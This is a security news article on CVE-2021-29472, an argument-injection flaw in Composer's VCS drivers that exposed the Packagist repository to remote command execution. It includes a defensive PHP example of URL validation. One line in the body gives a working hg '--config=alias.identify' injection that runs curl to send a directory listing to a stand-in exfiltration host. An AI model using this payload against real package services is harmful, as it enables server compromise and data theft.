Vulnerability in the Composer package manager that allowed compromising the Packagist PHP repository

A dangerous vulnerability (CVE-2021-29472) has been identified in the Composer dependency manager that allows arbitrary commands to be executed on the system while processing a package whose URL value, which specifies the address for downloading the source code, has been specially crafted. The problem lies in the GitDriver, SvnDriver and HgDriver components used with the Git, Subversion and Mercurial source control systems. The vulnerability has been fixed in Composer releases 1.10.22 and 2.0.13.

It is noted that the issue primarily affected Composer's package repository, Packagist, which holds 306 packages for PHP developers and serves more than 1.4 billion downloads per month. Testing showed that, knowing about the problem, attackers could have taken control of the Packagist infrastructure and intercepted maintainers' credentials, or redirected package downloads to a third-party server and served package variants with malicious changes in order to plant a backdoor on dependent systems during dependency installation.

The risk to end users is limited by the fact that the content of composer.json is usually specified by the user, and source links are only passed when accessing third-party repositories, which are generally trusted. The main blow fell on the Packagist.org repository and on private Packagist services, which invoke Composer with data received from users. Attackers could execute their code on Packagist servers by submitting a specially crafted package.

The Packagist team fixed the vulnerability within 12 hours of being notified. The researchers privately informed the Packagist developers on April 22, and the issue was fixed the same day. A public Composer update addressing the vulnerability was published on April 27, with details disclosed on April 28. An audit of the logs on the Packagist servers did not reveal any suspicious activity related to the vulnerability.

The problem is caused by a bug in the URL validation code for the root composer.json file and in the source download handlers. The bug had been present in the code since November 2011. Packagist uses wrapper layers to organize code loading without being tied to a specific source control system; these are executed by calling "fromShellCommandline" and passing command-line arguments. For example, for git the command "git ls-remote --heads $URL" is called, where the URL is processed with the "ProcessExecutor::escape($url)" method, which neutralizes dangerous shell constructs such as "$(...)" or "`...`".

The root of the problem is that the ProcessExecutor::escape method did not escape the "--" sequence, which made it possible to specify any additional call parameter inside the URL. Such escaping was missing in the GitDriver.php, SvnDriver.php and HgDriver.php drivers. An attack on GitDriver.php was hampered by the fact that the "git ls-remote" command does not accept additional arguments after the path. An attack on HgDriver.php became possible by passing the "--config" parameter to the "hg" utility, which makes it possible to arrange execution of any command by manipulating the "alias.identify" setting. For example, to download and execute code by running curl, one could specify: --config=alias.identify=!curl http://exfitration-host.tld --data "$(ls -alh)"
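The point above is that quoting an argument for the shell and validating it for the tool that receives it are two different problems: a value that is safely single-quoted still reaches `hg` as one argv element, and `hg` happily parses it as an option. The following added example (my own illustration, not Composer's code; `escapeshellarg()` stands in for `ProcessExecutor::escape`, and the scheme allow-list is an assumption chosen for the example) shows the vulnerable build of the `hg identify` command next to a hardened version that rejects option-shaped values and terminates option parsing with `--`.

```php
<?php
// Added example (not Composer's own code). Demonstrates why shell escaping alone
// does not stop argument injection, and one defensive validation for VCS URLs
// that are handed to an external tool as argv elements.

function buildHgIdentifyCommandVulnerable(string $url): string
{
    // escapeshellarg() wraps the value in single quotes, so $(...) and backticks
    // are inert for the shell. But the tool still receives the whole string as a
    // single argument, and a value beginning with '-' is parsed by hg as an option.
    return 'hg identify ' . escapeshellarg($url);
}

function isSafeVcsUrl(string $url): bool
{
    // Anything starting with '-' could be interpreted as an option by the VCS CLI.
    if ($url === '' || $url[0] === '-') {
        return false;
    }
    // Allow-list of transports this example accepts (assumption for the example).
    $allowed = ['https', 'http', 'ssh', 'git', 'svn', 'hg'];
    $scheme = parse_url($url, PHP_URL_SCHEME);
    // parse_url() yields null when the component is absent and false on malformed input.
    if ($scheme === null || $scheme === false) {
        return false;
    }
    return in_array(strtolower($scheme), $allowed, true);
}

function buildHgIdentifyCommandHardened(string $url): string
{
    if (!isSafeVcsUrl($url)) {
        throw new InvalidArgumentException('refusing VCS URL that could be parsed as an option: ' . $url);
    }
    // '--' ends option parsing, so even if validation regresses later the URL
    // can only ever be a positional argument.
    return 'hg identify -- ' . escapeshellarg($url);
}

// Constructed inputs: one benign URL and one option-shaped value of the same
// shape as the page's example (harmless echo instead of a network call).
$benign  = 'https://example.invalid/repo';
$payload = '--config=alias.identify=!echo injected';

echo "vulnerable, benign:  ", buildHgIdentifyCommandVulnerable($benign), PHP_EOL;
echo "vulnerable, payload: ", buildHgIdentifyCommandVulnerable($payload), PHP_EOL;

echo "isSafeVcsUrl(benign):  ", var_export(isSafeVcsUrl($benign), true), PHP_EOL;
echo "isSafeVcsUrl(payload): ", var_export(isSafeVcsUrl($payload), true), PHP_EOL;

echo "hardened, benign: ", buildHgIdentifyCommandHardened($benign), PHP_EOL;
try {
    buildHgIdentifyCommandHardened($payload);
} catch (InvalidArgumentException $e) {
    echo "hardened, payload: blocked (", $e->getMessage(), ")", PHP_EOL;
}
```

Running the script prints the vulnerable command line with the payload neatly single-quoted, which is exactly the trap: the quoting is correct for the shell, yet `hg` would still see `--config=alias.identify=!...` and honour it. The hardened builder fails closed on the leading dash and, for defence in depth, places `--` before the URL so that option parsing is already finished by the time the user-controlled value is read.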

By publishing a test package with a URL of this form on Packagist, the researchers confirmed that, after submission, their server received an HTTP request from one of Packagist's servers in AWS containing the list of files in the current directory.

source: budenet.ru
